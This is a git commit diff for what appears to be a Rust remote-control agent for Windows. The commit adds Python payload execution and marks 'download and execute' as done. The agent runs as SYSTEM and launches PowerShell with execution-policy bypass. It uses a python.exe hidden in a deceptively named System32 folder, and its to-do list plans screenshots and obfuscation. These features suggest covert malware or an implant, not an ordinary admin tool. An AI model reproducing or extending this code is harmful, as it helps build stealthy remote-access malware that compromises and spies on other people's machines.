feat: python

This commit is contained in:
Xory 2025-12-13 14:13:25 +02:00
parent a208b0d0ce
commit 0b4d668d41
3 changed files with 11 additions and 3 deletions

View file

@ -9,6 +9,11 @@ It is intended to run as NT AUTHORITY/SYSTEM, even if it uses WebSockets, becaus
- [X] reliable websockets - [X] reliable websockets
- [X] run\_as\_user - [X] run\_as\_user
- [X] basic commands - [X] basic commands
- [ ] download and execute - [X] download and execute
- [ ] dnx python - [X] dnx python
- [ ] windows service - [ ] windows service
- [ ] criticality
- [ ] screenshot functionality
- [ ] test payloads with arguments
- [ ] get more ideas from The Group(TM) i guess
- [ ] hardening/obfuscating???

BIN
embedded_py.7z Normal file

Binary file not shown.

View file

@ -100,7 +100,10 @@ pub async fn eval_command(text: impl Into<&str>) -> anyhow::Result<String> {
_exec_args = vec!["-ExecutionPolicy".to_string(), "Bypass".to_string(), "-File".to_string(), file_path.clone()]; _exec_args = vec!["-ExecutionPolicy".to_string(), "Bypass".to_string(), "-File".to_string(), file_path.clone()];
_exec_args.extend(params.args.iter().cloned()); _exec_args.extend(params.args.iter().cloned());
} }
PayloadType::Python => todo!("py payload handling"), PayloadType::Python => {
_exec_command = "C:\\Windows\\System32\\ExperienceOrientedReporter\\serialiser\\python.exe".to_string();
_exec_args = vec![file_path];
}
} }
// 3. Handle user vs system execution. // 3. Handle user vs system execution.